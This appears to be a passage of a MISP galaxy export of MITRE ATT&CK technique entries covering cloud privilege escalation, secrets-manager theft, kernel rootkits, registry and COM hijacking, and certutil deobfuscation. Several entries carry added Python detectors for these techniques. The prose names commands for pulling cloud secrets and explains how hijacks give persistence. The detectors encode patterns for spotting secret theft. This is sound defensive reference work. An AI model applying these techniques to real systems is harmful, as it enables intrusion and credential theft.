Adversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it’s all broken!)

The tag is: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1548.004"

Table 5505. Table References

Links

https://attack.mitre.org/techniques/T1548/004

https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html

https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg

https://objective-see.com/blog/blog_0x2A.html

https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8

Application or System Exploitation - T1499.004

Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.

Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also leave dependent applications and/or systems in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems.

The tag is: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004"

Table 5506. Table References

Links

https://attack.mitre.org/techniques/T1499/004

https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html

Temporary Elevated Cloud Access - T1548.005

Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.

Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Google Cloud Just in Time Access 2023)(Citation: Azure Just in Time Access 2023)

Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the iam.serviceAccountTokenCreator role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.(Citation: Google Cloud Service Account Authentication Roles) In Exchange Online, the ApplicationImpersonation role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange)

Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role’s access — for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the PassRole permission can allow a service they create to assume a given role, while in GCP, users with the iam.serviceAccountUser role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)

While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)

Note: this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)
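The permission review the paragraphs above call for, as an added example that is not code from the MISP galaxy or the cited AWS, Google or Rhino material: it flags the PassRole and impersonation grants named in the text. The policy documents are constructed samples (account 123456789012 is a placeholder), and NotAction/NotResource and Deny statements are not modelled.

```python
"""Find over-broad role-passing and impersonation grants in IAM policies.

Added example, not code from the MISP galaxy or the cited material.
  * AWS: Allow statements granting iam:PassRole on a wildcard resource without
    an iam:PassedToService condition, and sts:AssumeRole on "*";
  * GCP: project-level bindings of roles/iam.serviceAccountTokenCreator or
    roles/iam.serviceAccountUser, which cover every service account in the
    project.
Both policy documents are constructed; NotAction/NotResource/Deny are ignored.
"""
import fnmatch

ELEVATION_ACTIONS = ("iam:passrole", "sts:assumerole")  # compared lower-case
GCP_IMPERSONATION_ROLES = {"roles/iam.serviceAccountTokenCreator",
                           "roles/iam.serviceAccountUser"}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _action_matches(pattern, action):
    # IAM action names are case-insensitive and patterns may contain '*'.
    return fnmatch.fnmatchcase(action, pattern.lower())


def _broad_resource(resource):
    return resource == "*" or resource.lower().endswith(":role/*")


def aws_passrole_findings(policy):
    """Return (Sid, action, resource) for each risky Allow statement."""
    findings = []
    for st in _as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or "Action" not in st:
            continue
        # A PassedToService condition pins the role to one service principal.
        scoped = any(key.lower() == "iam:passedtoservice"
                     for block in st.get("Condition", {}).values()
                     for key in block)
        for pattern in _as_list(st["Action"]):
            for action in ELEVATION_ACTIONS:
                if not _action_matches(pattern, action):
                    continue
                for res in _as_list(st.get("Resource", "*")):
                    if action == "iam:passrole" and _broad_resource(res) and not scoped:
                        findings.append((st.get("Sid", "?"), action, res))
                    elif action == "sts:assumerole" and res == "*":
                        findings.append((st.get("Sid", "?"), action, res))
    return findings


def gcp_impersonation_findings(policy):
    """Return (role, member) for project-wide impersonation grants."""
    return [(b["role"], m)
            for b in policy.get("bindings", [])
            if b.get("role") in GCP_IMPERSONATION_ROLES
            for m in b.get("members", [])]


SAMPLE_AWS_POLICY = {  # constructed
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "DeployLambda", "Effect": "Allow",
         "Action": ["lambda:CreateFunction", "iam:PassRole"],
         "Resource": "*"},
        {"Sid": "ScopedPass", "Effect": "Allow",
         "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/app-runner",
         "Condition": {"StringEquals": {
             "iam:PassedToService": "ecs-tasks.amazonaws.com"}}},
        {"Sid": "AdminStar", "Effect": "Allow", "Action": "*", "Resource": "*"},
    ],
}

SAMPLE_GCP_POLICY = {  # constructed
    "bindings": [
        {"role": "roles/viewer",
         "members": ["group:analysts@example.com"]},
        {"role": "roles/iam.serviceAccountTokenCreator",
         "members": ["user:contractor@example.com"]},
        {"role": "roles/iam.serviceAccountUser",
         "members": ["group:ci-builders@example.com"]},
    ],
}

if __name__ == "__main__":
    for f in aws_passrole_findings(SAMPLE_AWS_POLICY):
        print("AWS", f)
    for f in gcp_impersonation_findings(SAMPLE_GCP_POLICY):
        print("GCP", f)
```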

The tag is: misp-galaxy:mitre-attack-pattern="Temporary Elevated Cloud Access - T1548.005"

Table 5507. Table References

Links

https://attack.mitre.org/techniques/T1548/005

https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project

https://cloud.google.com/iam/docs/service-account-permissions

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html

https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access

https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

Kernel Modules and Extensions - T1547.006

Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)

When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)

Kernel extensions, also called kexts, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and kernel extensions run as part of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through the <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)

Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)

Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)

The tag is: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006"

Table 5508. Table References

Links

http://tldp.org/HOWTO/Module-HOWTO/x197.html

http://www.megasecurity.org/papers/Rootkits.pdf

http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html

https://attack.mitre.org/techniques/T1547/006

https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/

https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf

https://developer.apple.com/support/kernel-extensions/

https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux

https://github.com/f0rb1dd3n/Reptile

https://github.com/m0nad/Diamorphine

https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/

https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/

https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/

https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web

https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html

https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/

https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Cloud Secrets Management Stores - T1555.006

Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.

Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.

If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as <code>get-secret-value</code> in AWS, <code>gcloud secrets describe</code> in GCP, and <code>az key vault secret show</code> in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)

Note: this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.
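Detection for the secret-retrieval calls described above, as an added example that is not code from the MISP galaxy or the cited Permiso/Sysdig reports: it runs over CloudTrail-shaped records for GetSecretValue. The events, account id and ARNs are constructed placeholders; the thresholds and the expected-reader prefixes are assumptions to tune per environment.

```python
"""Spot bulk or unexpected secret retrieval in a secrets-manager audit trail.

Added example, not code from the MISP galaxy or the cited reports. Two
questions a responder asks: which principal pulled an unusual number of
distinct secrets inside a short window, and which principals read secrets
without being one of the workloads expected to do so. Events are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

READ_EVENTS = {"GetSecretValue"}


def _parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")


def detect_bulk_reads(events, max_distinct=3, window=timedelta(minutes=10)):
    """Return {principal: sorted distinct secret ids} for every principal that
    reads more than max_distinct different secrets within any window."""
    by_principal = defaultdict(list)
    for e in events:
        if e["eventName"] in READ_EVENTS:
            by_principal[e["userIdentity"]["arn"]].append(
                (_parse_time(e["eventTime"]), e["requestParameters"]["secretId"]))
    alerts = {}
    for principal, reads in by_principal.items():
        reads.sort()
        for i, (start, _) in enumerate(reads):  # slide the window over each read
            seen = {sid for t, sid in reads[i:] if t - start <= window}
            if len(seen) > max_distinct:
                alerts[principal] = sorted(seen)
                break
    return alerts


def detect_unexpected_readers(events, expected_prefixes):
    """Return principals reading secrets whose ARN matches none of the
    expected prefixes (the roles of workloads that legitimately need them)."""
    readers = {e["userIdentity"]["arn"] for e in events
               if e["eventName"] in READ_EVENTS}
    return sorted(arn for arn in readers
                  if not any(arn.startswith(p) for p in expected_prefixes))


def _event(stamp, name, arn, secret_id=None):
    """Build a minimal CloudTrail-shaped record (constructed)."""
    return {"eventTime": stamp, "eventName": name,
            "userIdentity": {"arn": arn},
            "requestParameters": {"secretId": secret_id} if secret_id else {}}


APP_ROLE = "arn:aws:sts::123456789012:assumed-role/app-api/i-0placeholder"
USER = "arn:aws:iam::123456789012:user/alice"
EXPECTED_READERS = ["arn:aws:sts::123456789012:assumed-role/app-"]

SAMPLE_EVENTS = [  # constructed: one workload read, then an enumerating user
    _event("2024-05-01T09:00:10Z", "GetSecretValue", APP_ROLE, "prod/db-password"),
    _event("2024-05-01T14:02:01Z", "ListSecrets", USER),
    _event("2024-05-01T14:02:15Z", "GetSecretValue", USER, "prod/db-password"),
    _event("2024-05-01T14:02:40Z", "GetSecretValue", USER, "prod/api-key"),
    _event("2024-05-01T14:03:05Z", "GetSecretValue", USER, "prod/smtp"),
    _event("2024-05-01T14:03:30Z", "GetSecretValue", USER, "staging/db-password"),
    _event("2024-05-01T14:03:31Z", "GetSecretValue", USER, "prod/db-password"),
]

if __name__ == "__main__":
    print(detect_bulk_reads(SAMPLE_EVENTS))
    print(detect_unexpected_readers(SAMPLE_EVENTS, EXPECTED_READERS))
```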

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Secrets Management Stores - T1555.006"

Table 5509. Table References

Links

https://attack.mitre.org/techniques/T1555/006

https://cloud.google.com/secret-manager/docs/view-secret-details

https://docs.aws.amazon.com/secretsmanager/latest/userguide/retrieving-secrets.html

https://learn.microsoft.com/en-us/azure/key-vault/secrets/quick-create-cli

https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud

https://sysdig.com/blog/scarleteel-2-0/

Modify Cloud Compute Configurations - T1578.005

Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.

For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)

Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Configurations - T1578.005"

Table 5510. Table References

Links

https://attack.mitre.org/techniques/T1578/005

https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute

https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121

https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/

https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/

Services Registry Permissions Weakness - T1574.011

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service’s binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the <code>FailureCommand</code> key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)

The <code>Performance</code> key contains the name of a driver service’s performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the <code>Performance</code> key is not already present and if an adversary-controlled user has the <code>Create Subkey</code> permission, adversaries may create the <code>Performance</code> key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)

Adversaries may also add the <code>Parameters</code> key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, if adversaries launch their malicious services using svchost.exe, the service’s file may be identified using <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll</code>.(Citation: malware_hides_service)
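The review a defender runs for the weaknesses described above, as an added example that is not code from the MISP galaxy or the cited posts: it checks service-key ACEs and the ImagePath/ServiceDll locations. The snapshot structure and SAMPLE_SERVICES are constructed; on a live host the same structure would be filled from reg.exe or Get-Acl output.

```python
"""Review a snapshot of service Registry keys for the weaknesses described.

Added example, not code from the MISP galaxy or the cited posts. Two checks
run per service:
  * ACEs granting low-privileged principals value-write, subkey-create
    (enough to add a Performance key) or DACL/owner rights;
  * ImagePath / Parameters\\ServiceDll values outside protected system
    directories, where a non-admin could swap the binary.
SAMPLE_SERVICES is a constructed snapshot, not data from a real host.
"""
import ntpath

LOW_PRIV_PRINCIPALS = {"Everyone", "BUILTIN\\Users",
                       "NT AUTHORITY\\Authenticated Users",
                       "NT AUTHORITY\\INTERACTIVE"}
WRITE_RIGHTS = {"KEY_SET_VALUE", "KEY_CREATE_SUB_KEY", "WRITE_DAC",
                "WRITE_OWNER", "KEY_ALL_ACCESS", "GENERIC_WRITE", "GENERIC_ALL"}
PROTECTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\",
                      "c:\\program files (x86)\\")


def _normalize_path(value):
    """Expand common env vars, strip quotes and switches, lower-case."""
    v = value.strip()
    for var in ("%SystemRoot%", "%windir%", "\\SystemRoot"):
        v = v.replace(var, "C:\\Windows")
    if v.startswith('"'):
        v = v[1:].split('"', 1)[0]                   # quoted path: drop args
    else:
        v = v.split(" -", 1)[0].split(" /", 1)[0]    # drop -k / /switch args
    if not ntpath.splitdrive(v)[0]:                  # e.g. system32\drivers\x.sys
        v = ntpath.join("C:\\Windows", v.lstrip("\\"))
    return v.lower()


def weak_aces(service):
    """(principal, right) pairs where a low-privileged principal can write."""
    return sorted((principal, right)
                  for principal, rights in service.get("acl", {}).items()
                  if principal in LOW_PRIV_PRINCIPALS
                  for right in set(rights) & WRITE_RIGHTS)


def unprotected_binaries(service):
    """(value name, raw path) for binaries outside protected directories."""
    return [(key, service[key]) for key in ("ImagePath", "ServiceDll")
            if service.get(key)
            and not _normalize_path(service[key]).startswith(PROTECTED_PREFIXES)]


def review_services(services):
    """Return {service: {"weak_aces": [...], "unprotected": [...]}} for every
    service with at least one finding."""
    report = {}
    for name, svc in services.items():
        aces, bins = weak_aces(svc), unprotected_binaries(svc)
        if aces or bins:
            report[name] = {"weak_aces": aces, "unprotected": bins}
    return report


SAMPLE_SERVICES = {  # constructed snapshot, not data from a real host
    "HealthySvc": {
        "ImagePath": "%SystemRoot%\\system32\\svchost.exe -k netsvcs",
        "ServiceDll": "%SystemRoot%\\System32\\healthy.dll",
        "acl": {"NT AUTHORITY\\SYSTEM": ["KEY_ALL_ACCESS"],
                "BUILTIN\\Administrators": ["KEY_ALL_ACCESS"],
                "BUILTIN\\Users": ["KEY_READ"]},
    },
    "LooseAclSvc": {
        "ImagePath": "\"C:\\Program Files\\Vendor\\agent.exe\" --service",
        "acl": {"NT AUTHORITY\\SYSTEM": ["KEY_ALL_ACCESS"],
                "NT AUTHORITY\\Authenticated Users":
                    ["KEY_READ", "KEY_CREATE_SUB_KEY", "KEY_SET_VALUE"]},
    },
    "UserDirSvc": {
        "ImagePath": "C:\\Windows\\system32\\svchost.exe -k custom",
        "ServiceDll": "C:\\ProgramData\\Updater\\svc.dll",
        "acl": {"NT AUTHORITY\\SYSTEM": ["KEY_ALL_ACCESS"]},
    },
}

if __name__ == "__main__":
    for name, findings in review_services(SAMPLE_SERVICES).items():
        print(name, findings)
```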

The tag is: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011"

Table 5511. Table References

Links

https://attack.mitre.org/techniques/T1574/011

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree

https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN

https://itm4n.github.io/windows-registry-rpceptmapper-eop/

https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html

https://twitter.com/r0wdy_/status/936365549553991680

https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost

Component Object Model Hijacking - T1546.015

Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model) References to various COM objects are stored in the Registry.

Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component, which may cause that component to not work when executed. When that system component is executed through normal system operation, the adversary’s code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system, so as to avoid system instability that could lead to detection.
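A hunt for the hijacked Registry references described above, as an added example that is not code from the MISP galaxy or the cited G DATA/Elastic posts: because the user hive's CLSID tree is consulted before the machine hive's, a hijack usually appears as a CLSID registered under HKLM that also appears under HKCU with a different server binary. The two snapshots are constructed with placeholder GUIDs; the writable-path hints are an assumption.

```python
"""Hunt for per-user COM registrations that shadow machine-wide ones.

Added example, not code from the MISP galaxy or the cited posts. Input is
{CLSID: {value name: data}} for HKCU\\Software\\Classes\\CLSID and
HKLM\\Software\\Classes\\CLSID; on a live host export both trees and feed
them in. SAMPLE_HKLM / SAMPLE_HKCU are constructed with placeholder GUIDs.
"""
SERVER_VALUES = ("InprocServer32", "LocalServer32")
USER_WRITABLE_HINTS = ("\\appdata\\", "\\users\\public\\", "\\programdata\\",
                       "\\temp\\")


def _server(entry):
    """Return (value name, server path) for a CLSID entry, or (None, None)."""
    for name in SERVER_VALUES:
        if name in entry:
            return name, entry[name]
    return None, None


def find_com_hijacks(hkcu, hklm):
    """Return sorted (clsid, reason, user_server) findings.

    A user-hive entry that duplicates the HKLM path exactly is left alone
    (per-user installs of the same product do that); user-only entries are
    reported only when the server sits in a user-writable location."""
    findings = []
    for clsid, entry in hkcu.items():
        kind, user_server = _server(entry)
        if kind is None:
            continue
        _, machine_server = _server(hklm.get(clsid, {}))
        low = user_server.lower()
        if machine_server is not None and low != machine_server.lower():
            findings.append((clsid, "shadows HKLM " + kind, user_server))
        elif machine_server is None and any(h in low for h in USER_WRITABLE_HINTS):
            findings.append((clsid, "user-only " + kind + " in writable path",
                             user_server))
    return sorted(findings)


# Constructed snapshots: {CLSID: {value name: data}}; GUIDs are placeholders.
SAMPLE_HKLM = {
    "{00000000-0000-0000-0000-000000000001}":
        {"InprocServer32": "C:\\Windows\\System32\\example.dll"},
    "{00000000-0000-0000-0000-000000000002}":
        {"LocalServer32": "\"C:\\Program Files\\Vendor\\app.exe\""},
}
SAMPLE_HKCU = {
    "{00000000-0000-0000-0000-000000000001}":   # hijacked: same CLSID, new DLL
        {"InprocServer32": "C:\\Users\\alice\\AppData\\Roaming\\upd\\example.dll"},
    "{00000000-0000-0000-0000-000000000002}":   # benign per-user duplicate
        {"LocalServer32": "\"C:\\Program Files\\Vendor\\app.exe\""},
    "{00000000-0000-0000-0000-000000000003}":   # user-only, writable path
        {"InprocServer32": "C:\\Users\\Public\\Libraries\\helper.dll"},
}

if __name__ == "__main__":
    for finding in find_com_hijacks(SAMPLE_HKCU, SAMPLE_HKLM):
        print(finding)
```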

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015"

Table 5512. Table References

Links

https://attack.mitre.org/techniques/T1546/015

https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

https://msdn.microsoft.com/library/ms694363.aspx

https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com

Deobfuscate/Decode Files or Information - T1140

Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or using utilities present on the system.

One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)

Sometimes a user’s action may be required to open a file for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)
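A check for the certutil case described above, as an added example that is not code from the MISP galaxy or the cited Malwarebytes write-up: certutil -decode base64-decodes whatever sits between the BEGIN/END CERTIFICATE lines, so the armor itself proves nothing, and this decodes the payload to see whether it is a DER certificate or an executable. Both sample files are constructed.

```python
"""Tell a genuine PEM certificate from a PE hidden behind certificate armor.

Added example, not code from the MISP galaxy or the cited write-up. A DER
certificate starts with an ASN.1 SEQUENCE tag (0x30) whose encoded length
must match the payload, while a Windows executable starts with 'MZ' and has
a 'PE\\0\\0' signature at the offset stored at e_lfanew (0x3C). The sample
files built below are constructed.
"""
import base64
import re
import struct

ARMOR = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----",
                   re.S)


def decode_armor(text):
    """Raw bytes of every armored block, decoded the way certutil would."""
    return [base64.b64decode("".join(block.split())) for block in ARMOR.findall(text)]


def classify_payload(data):
    """'pe-executable', 'mz-header' (MZ stub without a PE signature),
    'der-certificate', 'der-truncated' or 'unknown'."""
    if data[:2] == b"MZ":
        if len(data) >= 0x40:
            e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
            if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
                return "pe-executable"
        return "mz-header"
    if len(data) >= 2 and data[0] == 0x30:
        if data[1] & 0x80:                       # long-form length
            nlen = data[1] & 0x7F
            length, hdr = int.from_bytes(data[2:2 + nlen], "big"), 2 + nlen
        else:                                    # short-form length
            length, hdr = data[1], 2
        return "der-certificate" if len(data) == hdr + length else "der-truncated"
    return "unknown"


def scan_certificate_file(text):
    """One classification per armored block; anything but 'der-certificate'
    in a file that claims to be a certificate deserves analyst attention."""
    return [classify_payload(blob) for blob in decode_armor(text)]


# --- constructed samples -------------------------------------------------
def _fake_pe():
    """Minimal bytes that satisfy the MZ + PE signature layout (not runnable)."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)       # e_lfanew -> PE header
    return bytes(hdr) + b"PE\0\0" + b"\0" * 20


def _fake_der():
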